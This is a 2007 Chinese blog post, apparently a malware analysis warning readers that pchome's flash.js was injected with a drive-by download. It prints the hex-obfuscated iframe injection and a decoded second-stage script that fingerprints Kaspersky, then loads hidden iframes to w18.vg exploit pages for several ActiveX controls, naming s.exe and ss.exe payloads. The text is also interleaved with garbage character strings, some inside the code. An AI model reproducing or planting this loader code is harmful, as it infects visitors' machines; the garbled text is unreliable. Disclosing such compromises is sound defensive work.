|
截至2007-12-28 18:17 仍未修复
; I) q# t( S4 L6 z$ J
$ A" ]0 M) T9 C2 I; J2 H
8 L( {# A. r, o& U##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I6 R6 K6 D$ ?) j% r" ]* V
0 w" U ~% `% g* _0 n# [2 V) |1 @
从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView
: m+ G9 k: S3 ?% K8 q1 e# b; Q' l7 S! I1 _8 {% m& P9 i0 h8 `- f
挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:# r$ t" O" e5 f- w, [
9 ~% P" C2 g; h o9 } K: Nwindow["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');7 N! Y, j0 y; B$ `6 u
3 r& q U2 [: E1 Y/ i& P8 T# S0 W8 H% o
也就是这个了:, N) q' u" T& i( j. |
3 l! K) j% f& v# t
window["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');
0 w. ^( a. ]0 d3 {# N$ H/ Z' ~# l. n9 V( i9 S! }
但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:
& L! x l3 y/ Q1 \* r% K& j7 G8 y, u: t5 s9 [
<script language="javascript" type="text/javascript">) M3 ]# V% _7 @2 `; s) p
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
. F9 j. y. {- A+ W) i# b</script>. L3 W: t, \" L
0 O$ v! f% @) S' a1 s" v
有了这个,iframe就生效了;经过一番调用和解密后得:
8 Y' T7 y5 b" E$ `3 J: w, ^1 Z
& [" D. ] e6 Z1 kfunction bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}2 g$ m7 S \* y {0 k
' _4 I K& E2 {K##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
' v1 D; i( X/ |& N7 S
! U& `/ W! x% C, m3 q) a9 y; \4 y
挑了几个解密得:http://w18.vg/s.exe% p: f- z: s; @( v7 p0 N( h5 w8 F
9 F6 U/ P+ n- ^4 i; [
从这个文件里面得到另外一个链接:http://w18.vg/ss.exe$ \+ f9 m) _& V+ }9 n ?, h
; }6 ?, g0 P' E' f. r2 L有点面熟的东西……
$ B b: j- A( a% j* {' q# a
. w) {7 z" E. z' _$ E: P##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
$ M$ B2 _5 m) M+ u. V+ i: S2 m6 d) D5 F) i# U( h; [( \' o5 _
从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。0 i; }9 `" i ]; ?7 f5 ^
; N0 f% V3 ~( H, ~5 e/ UK$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE5 t6 V4 O. {- _) D! k2 I
5 F# { `' B7 i, x转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html) 2 ]0 F! A! Z5 {/ r, S1 h' {/ a
9 i' h X( z. `1 d3 d6 Q% g9 o$ k2 u- c+ K* \' v# {2 S7 R
作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html |
|